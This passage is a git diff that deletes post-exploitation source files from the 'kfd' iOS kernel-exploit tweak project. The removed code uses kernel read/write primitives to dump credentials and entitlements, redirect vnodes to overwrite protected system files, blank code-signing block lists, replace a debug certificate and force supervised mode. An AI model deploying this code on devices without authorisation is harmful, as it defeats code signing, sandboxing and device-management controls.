off_vnode_vu_ubcinfo) | 0xffffff8000000000; - uint32_t cs_add_gen = kread32(ubc_info + 0x2c); -// cs_add_gen += 1; - printf("cs_add_gen, 0x2c: 0x%x\n", cs_add_gen); - kwrite32(ubc_info + 0x2c, cs_add_gen); - - uint64_t csblobs = kread64(ubc_info + 0x50); - printf("csblobs: 0x%llx\n", csblobs); - uint32_t csb_flags = kread32(csblobs + 0x20); - printf("csb_flags: 0x%x\n", csb_flags); - uint64_t csb_teamid = kread64(csblobs + 0x88); - printf("csb_teamid: 0x%llx\n", csb_teamid); - - printf("csb_cdhash\n"); - HexDump(csblobs + 0x58, 20); //csblobs + 0x58 = csb_cdhash - - return 0; -} - -uint64_t fun_proc_dump_entitlements(uint64_t proc) { - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); - - uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); - uint64_t cr_label = cr_label_pac | 0xffffff8000000000; - printf("[i] ucred->cr_label: 0x%llx\n", cr_label); - - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/cs_blobs.h#L283 - //Thanks @jmpews, https://twitter.com/jmpews/status/1623669186894659584/photo/3 - uint64_t osents = kread64(cr_label + 8);//+8, 16, 32, 64, 104, 112, 128, 168, 176, 232, 240 has kernel pointer values... 
- printf("[i] osents: 0x%llx\n", osents); - uint64_t osentitlements = kread64(osents + 0x10); - printf("[i] osentitlements: 0x%llx\n", osentitlements); - uint64_t query_ctx = osentitlements + 0x20; - printf("[i] query_ctx: 0x%llx\n", query_ctx); - uint64_t der_start = kread64(query_ctx + 0x40); - printf("[i] der_start: 0x%llx\n", der_start); - uint64_t der_end = kread64(query_ctx + 0x20); - printf("[i] der_end: 0x%llx\n", der_end); - uint64_t der_len = der_end - der_start; - printf("[i] der_len: 0x%llx\n", der_len); - uint8_t has_no_der_ents = kread8(osentitlements + 0x50); - printf("[i] has_no_der_ents: 0x%x\n", has_no_der_ents); - uint64_t csb_der_entitlements_blob = kread64(osentitlements + 0x60); - printf("[i] csb_der_entitlements_blob: 0x%llx\n", csb_der_entitlements_blob); - - if(!has_no_der_ents) { - CS_GenericBlob der_ents_blob = {0}; - kreadbuf(csb_der_entitlements_blob, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); - uint32_t der_ents_data_len = der_ents_blob.length; - printf("[i] der_ents_blob.length: 0x%x\n", convertToLittleEndian(der_ents_data_len)); - - uint8_t *der_ents_data = malloc(der_len); - kreadbuf(csb_der_entitlements_blob + 8, der_ents_data, der_len); - uint8_t *us_der_end = der_ents_data + der_len; - - NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); - if(entitlements != nil) { - NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); - } else { - HexDump(csb_der_entitlements_blob, der_len); - } - free(der_ents_data); - } - - return 0; -} - -uint64_t fun_vnode_dump_entitlements(const char* path) { - uint64_t vnode = getVnodeAtPath(path); - - uint64_t ubc_info_pac = kread64(vnode + off_vnode_vu_ubcinfo); - uint64_t ubc_info = ubc_info_pac | 0xffffff8000000000; - - uint64_t csblobs = kread64(ubc_info + 0x50); - if(csblobs == 0) { - printf("[-] Couldn't get csblobs from vnode.\n"); - return -1; - } - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/ubc_internal.h#L148 - 
uint64_t csb_pmap_cs_entry = kread64(csblobs + 0xb8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry: 0x%llx\n", csb_pmap_cs_entry); - - uint32_t csb_validation_category = kread32(csblobs + 0xb0); - printf("[i] vnode->ubc_info->cs_blobs->csb_validation_category: 0x%x\n", csb_validation_category); - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/vm/pmap_cs.h#L365 - uint64_t ce_ctx = kread64(csb_pmap_cs_entry + 0x1c8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->ce_ctx: 0x%llx\n", ce_ctx); - uint32_t der_entitlements_size = kread32(csb_pmap_cs_entry + 0x1d8); - printf("[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry->der_entitlements_size: 0x%x\n", der_entitlements_size); - - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/EntitlementsPriv.h#L21 - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/der_vm.h#L33 - uint64_t der_start = kread64(ce_ctx + 0x38); - printf("[i] der_start: 0x%llx\n", der_start); - uint64_t der_end = kread64(ce_ctx + 0x20); - printf("[i] der_end: 0x%llx\n", der_end); - uint64_t der_len = der_end - der_start; - printf("[i] der_len: 0x%llx\n", der_len); - - CS_GenericBlob der_ents_blob = {0}; - kreadbuf(der_start, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); - uint32_t der_ents_data_len = der_ents_blob.length; - printf("[i] der_ents_blob.length: 0x%x\n", convertToLittleEndian(der_ents_data_len)); - - uint8_t *der_ents_data = malloc(der_len); - kreadbuf(der_start + 8, der_ents_data, der_len); - uint8_t *us_der_end = der_ents_data + der_len; - - NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); - if(entitlements != nil) { - NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); - } else { - HexDump(der_start, der_len); - } - free(der_ents_data); - - return 0; -} 
diff --git a/kfd/fun/fun.h b/kfd/fun/fun.h
deleted file mode 100644
index d1b45a76..00000000
--- a/kfd/fun/fun.h
+++ /dev/null
@@ -1,26 +0,0 @@
-//
-// fun.h
-// kfd
-//
-// Created by Seo Hyun-gyu on 2023/07/25.
-//
-
-#ifndef fun_h
-#define fun_h
-
-#include
-#include
-
-typedef mach_port_t io_object_t;
-typedef io_object_t io_service_t, io_connect_t, io_registry_entry_t;
-extern const mach_port_t kIOMasterPortDefault;
-
-void do_fun(char** enabledTweaks, int numTweaks);
-uint64_t fun_nvram_dump(void);
-void backboard_respring(void);
-int funUcred(uint64_t proc);
-int funCSFlags(char* process);
-int funTask(char* process);
-uint64_t fun_ipc_entry_lookup(mach_port_name_t port_name);
-
-#endif /* fun_h */
diff --git a/kfd/fun/fun.m b/kfd/fun/fun.m
deleted file mode 100644
index 4fe5c40b..00000000
--- a/kfd/fun/fun.m
+++ /dev/null
@@ -1,377 +0,0 @@ -// -// fun.c -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/25. -// - -#import -#import -#import -#import -#include -#include -#include -#include -#include -#include "krw.h" -#include "offsets.h" -#include "proc.h" -#include "vnode.h" -#include "grant_full_disk_access.h" -#include "thanks_opa334dev_htrowii.h" -#include "utils.h" -#include "helpers.h" -#include "cs_blobs.h" - -int funUcred(uint64_t proc) { - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); - - uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); - uint64_t cr_label = cr_label_pac | 0xffffff8000000000; - printf("[i] self ucred->cr_label: 0x%llx\n", cr_label); - - uint64_t cr_posix_p = ucreds + off_u_cr_posix; - printf("[i] self ucred->posix_cred->cr_uid: %u\n", kread32(cr_posix_p + off_cr_uid)); - printf("[i] self ucred->posix_cred->cr_ruid: %u\n", kread32(cr_posix_p + off_cr_ruid)); - printf("[i] self ucred->posix_cred->cr_svuid: %u\n", kread32(cr_posix_p + off_cr_svuid)); - printf("[i] self ucred->posix_cred->cr_ngroups: %u\n", kread32(cr_posix_p + off_cr_ngroups)); - printf("[i] self ucred->posix_cred->cr_groups: %u\n", kread32(cr_posix_p + off_cr_groups)); - printf("[i] self ucred->posix_cred->cr_rgid: %u\n", kread32(cr_posix_p + off_cr_rgid)); - printf("[i] self ucred->posix_cred->cr_svgid: %u\n", kread32(cr_posix_p + off_cr_svgid)); - printf("[i] self ucred->posix_cred->cr_gmuid: %u\n", kread32(cr_posix_p + off_cr_gmuid)); - printf("[i] self ucred->posix_cred->cr_flags: %u\n", kread32(cr_posix_p + off_cr_flags)); - - return 0; -} - -void backboard_respring(void) { - kfd_xpc_crasher("com.apple.cfprefsd.daemon"); - kfd_xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); -} - -int funCSFlags(char* process) { - pid_t pid = getPidByName(process); - uint64_t proc = getProc(pid); - - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - printf("[i] %s proc->proc_ro: 0x%llx\n", process, proc_ro); - uint32_t 
csflags = kread32(proc_ro + off_p_ro_p_csflags); - printf("[i] %s proc->proc_ro->p_csflags: 0x%x\n", process, csflags); - -#define TF_PLATFORM 0x400 - -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ - -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ - -#define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */ - - csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL); - sleep(3); - printf("[i] setting csflags: 0x%x\n", process, csflags); - //kwrite32(proc_ro + off_p_ro_p_csflags, csflags); - - return 0; -} - -int funTask(char* process) { - pid_t pid = getPidByName(process); - uint64_t proc = getProc(pid); - printf("[i] %s proc: 0x%llx\n", process, proc); - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - - uint64_t pr_proc = kread64(proc_ro + off_p_ro_pr_proc); - printf("[i] %s proc->proc_ro->pr_proc: 0x%llx\n", process, pr_proc); - - uint64_t pr_task = kread64(proc_ro + off_p_ro_pr_task); - printf("[i] %s proc->proc_ro->pr_task: 0x%llx\n", process, pr_task); - - //proc_is64bit_data+0x18: LDR W8, [X8,#0x3D0] - uint32_t t_flags = kread32(pr_task + off_task_t_flags); - printf("[i] %s task->t_flags: 0x%x\n", process, t_flags); - - - /* - * RO-protected flags: - */ - #define TFRO_PLATFORM 0x00000400 /* task is a platform binary */ - #define TFRO_FILTER_MSG 0x00004000 /* task calls into message filter callback before sending a message */ - #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */ - #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state 
*/ - - //uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); - //printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); - - return 0; -} - -uint64_t fun_ipc_entry_lookup(mach_port_name_t port_name) { - uint64_t proc = getProc(getpid()); - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - - uint64_t pr_proc = kread64(proc_ro + off_p_ro_pr_proc); - printf("[i] self proc->proc_ro->pr_proc: 0x%llx\n", pr_proc); - - uint64_t pr_task = kread64(proc_ro + off_p_ro_pr_task); - printf("[i] self proc->proc_ro->pr_task: 0x%llx\n", pr_task); - - uint64_t itk_space_pac = kread64(pr_task + 0x300); - uint64_t itk_space = itk_space_pac | 0xffffff8000000000; - printf("[i] self task->itk_space: 0x%llx\n", itk_space); - uint32_t port_index = MACH_PORT_INDEX(port_name); - uint32_t table_size = kread32(itk_space + 0x14); - printf("[i] table_size: 0x%x, port_index: 0x%x\n", table_size, port_index); - if (port_index >= table_size) { - printf("[-] invalid port name 0x%x\n", port_name); - } - - //0x20 = IPC_SPACE_IS_TABLE_OFF - uint64_t is_table = kread64_smr(itk_space + 0x20); - printf("[i] self task->itk_space->is_table: 0x%llx\n", is_table); - - uint64_t entry = is_table + port_index * 0x18/*SIZE(ipc_entry)*/; - printf("[i] entry: 0x%llx\n", entry); - - uint64_t object_pac = kread64(entry + 0x0/*OFFSET(ipc_entry, ie_object)*/); - uint64_t object = object_pac | 0xffffff8000000000; - uint32_t ip_bits = kread32(object + 0x0/*OFFSET(ipc_port, ip_bits)*/); - uint32_t ip_refs = kread32(object + 0x4/*OFFSET(ipc_port, ip_references)*/); - uint64_t kobject_pac = kread64(object + 0x48/*OFFSET(ipc_port, ip_kobject)*/); - uint64_t kobject = kobject_pac | 0xffffff8000000000; - printf("[i] ipc_port: ip_bits 0x%x, ip_refs 0x%x\n", ip_bits, ip_refs); - printf("[i] ip_kobject: 0x%llx\n", kobject); - - return kobject; -} - -static uint32_t -extract32(uint32_t val, unsigned start, unsigned len) { - return (val >> start) & (~0U >> (32U - len)); -} - -typedef mach_port_t 
io_object_t; -typedef io_object_t io_service_t, io_connect_t, io_registry_entry_t; -extern const mach_port_t kIOMasterPortDefault; -#define kIODeviceTreePlane "IODeviceTree" -CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options); -#define IO_OBJECT_NULL ((io_object_t)0) -#define OS_STRING_LEN(a) extract32(a, 14, 18) - -typedef char io_string_t[512]; -io_registry_entry_t IORegistryEntryFromPath(mach_port_t master, const io_string_t path); - - -static uint64_t -lookup_io_object(io_object_t object) { - return fun_ipc_entry_lookup(object); -} - -static uint64_t -get_of_dict(io_registry_entry_t nvram_entry) { - uint64_t nvram_object = fun_ipc_entry_lookup(nvram_entry); - - return kread64(nvram_object + 0xc0); //io_dt_nvram_of_dict_off = 0xC0; -} - -static uint64_t print_key_value_in_os_dict(uint64_t os_dict) { - uint64_t os_dict_entry_ptr, string_ptr, val_ptr = 0; - uint32_t os_dict_cnt, cur_key_len, cur_val_len; - size_t max_key_len = 1024; - struct { - uint64_t key, val; - } os_dict_entry; - char *cur_key; - - if(((cur_key = malloc(max_key_len)) != NULL) /*&& ((cur_val = malloc(max_value_len)) != NULL)*/) { - os_dict_entry_ptr = kread64(os_dict + 0x20/*OS_DICTIONARY_DICT_ENTRY_OFF*/); - if(os_dict_entry_ptr != 0) { - os_dict_entry_ptr = os_dict_entry_ptr | 0xffffff8000000000; - printf("[i] os_dict_entry_ptr: 0x%llx\n", os_dict_entry_ptr); - os_dict_cnt = kread32(os_dict + 0x14/*OS_DICTIONARY_COUNT_OFF*/); - if(os_dict_cnt != 0) { - printf("[i] os_dict_cnt: 0x%x\n", os_dict_cnt); - while(os_dict_cnt-- != 0) { - kreadbuf(os_dict_entry_ptr + os_dict_cnt * sizeof(os_dict_entry), &os_dict_entry, sizeof(os_dict_entry)); - printf("key: 0x%llx, val: 0x%llx\n", os_dict_entry.key, os_dict_entry.val); - - //KEY - cur_key_len = kread32(os_dict_entry.key + 0xc/*OS_STRING_LEN_OFF*/); - if(cur_key_len == 0) { - break; - } - cur_key_len = OS_STRING_LEN(cur_key_len); - string_ptr = kread64(os_dict_entry.key + 
0x10/*OS_STRING_STRING_OFF*/); - if(string_ptr == 0) { - break; - } - string_ptr = string_ptr | 0xffffff8000000000; - kreadbuf(string_ptr, cur_key, cur_key_len); - printf("[+] key_str: %s, key_str_len: 0x%x\n", cur_key, cur_key_len); - - - //VALUE - HexDump(os_dict_entry.val, 100); - cur_val_len = kread32(os_dict_entry.val + 0xc/*OS_STRING_LEN_OFF*/); - if(cur_val_len == 0) { - printf("[-] cur_val_len = 0\n"); - continue; - } - val_ptr = kread64(os_dict_entry.val + 0x18/*?*/); - val_ptr = val_ptr | 0xffffff8000000000; - if(val_ptr == 0) { - printf("[-] val_ptr = 0\n"); - continue; - } - - char* cur_val = malloc(cur_val_len); - kreadbuf(val_ptr, cur_val, cur_val_len); - printf("[+] val_str: %s, val_str_len: 0x%x\n", cur_val, cur_val_len); - free(cur_val); - } - } - } - free(cur_key); - } - return 0; -} - - -uint64_t fun_nvram_dump(void) { - - io_registry_entry_t nvram_entry = IORegistryEntryFromPath(kIOMasterPortDefault, kIODeviceTreePlane ":/options"); - - if(nvram_entry != IO_OBJECT_NULL) { - printf("[i] nvram_entry: 0x%x\n", nvram_entry); - - uint64_t of_dict = get_of_dict(nvram_entry); - printf("[i] of_dict: 0x%llx\n", of_dict); - - print_key_value_in_os_dict(of_dict); - } - return 0; -} - -// Function to find files with specific extensions in a directory, doesn't work??? wtf? 
-NSArray *findFilesWithExtensions(NSArray *extensions, NSString *directory) { - NSFileManager *fileManager = [NSFileManager defaultManager]; - NSArray *fileNames = [fileManager contentsOfDirectoryAtPath:directory error:nil]; - - NSMutableArray *filePaths = [NSMutableArray array]; - for (NSString *fileName in fileNames) { - if ([extensions containsObject:fileName.pathExtension]) { - [filePaths addObject:[directory stringByAppendingPathComponent:fileName]]; - } - } - - return filePaths; -} - -NSDictionary *changeDictValue(NSDictionary *dictionary, NSString *key, id value) { - NSMutableDictionary *mutableDictionary = [dictionary mutableCopy]; - [mutableDictionary setValue:value forKey:key]; - return [mutableDictionary copy]; -} - -@interface MyUtility : NSObject - -+ (void)applyDynamicIsland; - -@end - -@implementation MyUtility - -+ (void)applyDynamicIsland { - printf("Tryna apply dynamic island"); - sleep(1); - NSString *backupFilePath = [NSString stringWithFormat:@"%@/com.apple.MobileGestalt-BACKUP.plist", NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES)[0]]; - - if (![[NSFileManager defaultManager] fileExistsAtPath:backupFilePath]) { - NSString *sourceFilePath = @"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist"; - NSData *plistData = [NSData dataWithContentsOfFile:sourceFilePath]; - [plistData writeToFile:backupFilePath atomically:YES]; - } - - NSData *plistData = [NSData dataWithContentsOfFile:backupFilePath]; - NSError *error = nil; - NSDictionary *plist = [NSPropertyListSerialization propertyListWithData:plistData options:0 format:nil error:&error]; - - if (error) { - NSLog(@"Error while reading plist: %@", error); - return; - } - - NSDictionary *newPlist = changeDictValue(plist, @"ArtworkDeviceSubType", @2796); - NSData *newData = [NSPropertyListSerialization dataWithPropertyList:newPlist format:NSPropertyListBinaryFormat_v1_0 options:0 error:&error]; - - 
if (error) { - NSLog(@"Error while serializing plist: %@", error); - return; - } - - if (newData.length == plistData.length) { - NSLog(@"Same Size!"); - NSString *temporaryFilePath = [NSTemporaryDirectory() stringByAppendingPathComponent:@"temp_com.apple.MobileGestalt.plist"]; - [newData writeToFile:temporaryFilePath atomically:YES]; - funVnodeOverwriteFile(@"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist", temporaryFilePath.UTF8String); - } else { - NSLog(@"OLD DATA: %lu", (unsigned long)plistData.length); - NSLog(@"NEW DATA: %lu", (unsigned long)newData.length); - } -} - - -void do_fun(char** enabledTweaks, int numTweaks) { - - _offsets_init(); - - uint64_t kslide = get_kslide(); - uint64_t kbase = 0xfffffff007004000 + kslide; - printf("[i] Kernel base: 0x%llx\n", kbase); - printf("[i] Kernel slide: 0x%llx\n", kslide); - uint64_t kheader64 = kread64(kbase); - printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); - - pid_t myPid = getpid(); - uint64_t selfProc = getProc(myPid); - printf("[i] self proc: 0x%llx\n", selfProc); - - funUcred(selfProc); - funProc(selfProc); -// kfd_grant_full_disk_access(^(NSError* error) { -// NSLog(@"[-] grant_full_disk_access returned error: %@", error); -// }); - for (int i = 0; i < numTweaks; i++) { - char *tweak = enabledTweaks[i]; - printf("[i] tweaks\n"); - if (strcmp(tweak, "enableHideHomebar") == 0) { - funVnodeHide("/System/Library/PrivateFrameworks/MaterialKit.framework/Assets.car"); - } - if (strcmp(tweak, "HideDock") == 0) { - funVnodeHide("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockDark.materialrecipe"); - funVnodeHide("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockLight.materialrecipe"); - } - if (strcmp(tweak, "enableReplacecert") == 0) { - funVnodeOverwrite2("/System/Library/Lockdown/iPhoneDebug.pem", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/cert.pem"].UTF8String); - } - 
if (strcmp(tweak, "enableCustomFont") == 0) { - funVnodeOverwrite2("/System/Library/Fonts/CoreUI/SFUI.ttf", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/SFUI.ttf"].UTF8String); - } - if (strcmp(tweak, "changeRegion") == 0) { - regionChanger(@"C", @"C/A"); - } - if (strcmp(tweak, "whitelist") == 0) { - whitelist(); - } - if (strcmp(tweak, "supervise") == 0) { - setSuperviseMode(true); - } - } -} -@end diff --git a/kfd/fun/utils.h b/kfd/fun/utils.h deleted file mode 100644 index 5913bb37..00000000 --- a/kfd/fun/utils.h +++ /dev/null @@ -1,24 +0,0 @@ -// -// utils.h -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/30. -// - -#include -#include -#include - -uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath); -uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath); -int clearUICache(void); -int VarMobileWriteTest(void); -int VarMobileRemoveTest(void); -int VarMobileWriteFolderTest(void); -int VarMobileRemoveFolderTest(void); -int setSuperviseMode(bool enable); -int removeKeyboardCache(void); -int regionChanger(NSString *country_value, NSString *region_value); -void HexDump(uint64_t addr, size_t size); -bool sandbox_escape_can_i_access_file(char* path, int mode); -int whitelist(void); diff --git a/kfd/fun/utils.m b/kfd/fun/utils.m deleted file mode 100644 index 4ee0c556..00000000 --- a/kfd/fun/utils.m +++ /dev/null 
@@ -1,317 +0,0 @@
-//
-// utils.m
-// kfd
-//
-// Created by Seo Hyun-gyu on 2023/07/30.
-//
-
-#import
-#import
-#import
-#import
-#import
-#import "proc.h"
-#import "vnode.h"
-#import "krw.h"
-#import "helpers.h"
-#include "offsets.h"
-#import "thanks_opa334dev_htrowii.h"
-#import
-#import "utils.h"
-
-uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath) {
- [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil];
- [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil];
- uint64_t orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode);
- return orig_to_v_data;
-}
-
-uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath) {
- funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data);
- [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil];
- return 0;
-}
-
-int VarMobileWriteTest(void) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t var_mobile_vnode = getVnodeVarMobile();
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- //create
- int open_fd = open([mntPath stringByAppendingString:@"/can_i_remove_file"].UTF8String, O_WRONLY | O_CREAT | O_TRUNC, 0644);
- const char* data = "PLZ_GIVE_ME_GIRLFRIENDS!@#";
- write(open_fd, data, strlen(data));
- close(open_fd);
-
- dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-int VarMobileWriteFolderTest(void) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t var_mobile_vnode = getVnodeVarMobile();
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- //create
- mkdir([mntPath stringByAppendingString:@"/can_i_remove_folder"].UTF8String, 0755);
-
- dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-int VarMobileRemoveTest(void) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t var_mobile_vnode = getVnodeVarMobile();
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- //remove
- int ret = remove([mntPath stringByAppendingString:@"/can_i_remove_file"].UTF8String);
- printf("remove ret: %d\n", ret);
-
- dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-int VarMobileRemoveFolderTest(void) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t var_mobile_vnode = getVnodeVarMobile();
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- //remove
- [[NSFileManager defaultManager] removeItemAtPath:[mntPath stringByAppendingString:@"/can_i_remove_folder"] error:nil];
-
- dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile directory list: %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-int clearPlist(NSString *path) {
- NSDictionary *dictionary = @{};
-
- BOOL success = [dictionary writeToFile:path atomically:YES];
- if (!success) {
- printf("[-] Failed createPlistAtPath.\n");
- return -1;
- }
-
- return 0;
-}
-
-int whitelist() {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- //1. Create files
- uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp");
- printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode);
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath);
-
- clearPlist([mntPath stringByAppendingString:@"/Rejections.plist"]);
- clearPlist([mntPath stringByAppendingString:@"/AuthListBannedUpps.plist"]);
- clearPlist([mntPath stringByAppendingString:@"/AuthListBannedCdHashes.plist"]);
- clearPlist([mntPath stringByAppendingString:@"/AGP.plist"]);
- clearPlist([mntPath stringByAppendingString:@"/UserTrustedUpps.plist"]);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
-
- //2. Copy
-
- funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/Rejections.plist", "/var/tmp/Rejections.plist");
- funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AuthListBannedUpps.plist", "/var/tmp/AuthListBannedUpps.plist");
- funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AuthListBannedCdHashes.plist", "/var/tmp/AuthListBannedCdHashes.plist");
- funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AGP.plist", "/var/tmp/AGP.plist");
- funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/UserTrustedUpps.plist", "/var/tmp/UserTrustedUpps.plist");
-
- return 0;
-}
-
-int setSuperviseMode(BOOL enable) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t configurationprofiles_vnode = getVnodeAtPathByChdir("/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles");
- printf("[i] /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles vnode: 0x%llx\n", configurationprofiles_vnode);
-
- uint64_t orig_to_v_data = createFolderAndRedirect(configurationprofiles_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles directory list:\n %@", dirs);
-
- //set value of "IsSupervised" key
- NSString *plistPath = [mntPath stringByAppendingString:@"/CloudConfigurationDetails.plist"];
-
- NSMutableDictionary *plist = [NSMutableDictionary dictionaryWithContentsOfFile:plistPath];
-
- if (plist) {
- // Set the value of "IsSupervised" key to true
- [plist setObject:@(enable) forKey:@"IsSupervised"];
-
- // Save the updated plist back to the file
- if ([plist writeToFile:plistPath atomically:YES]) {
- printf("[+] Successfully set IsSupervised in the plist.");
- } else {
- printf("[-] Failed to write the updated plist to file.");
- }
- } else {
- printf("[-] Failed to load the plist file.");
- }
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-int removeKeyboardCache(void) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t vnode = getVnodeAtPath("/var/mobile/Library/Caches/com.apple.keyboards/images");
- if(vnode == -1) return 0;
-
- uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile/Library/Caches/com.apple.keyboards/images directory list:\n %@", dirs);
-
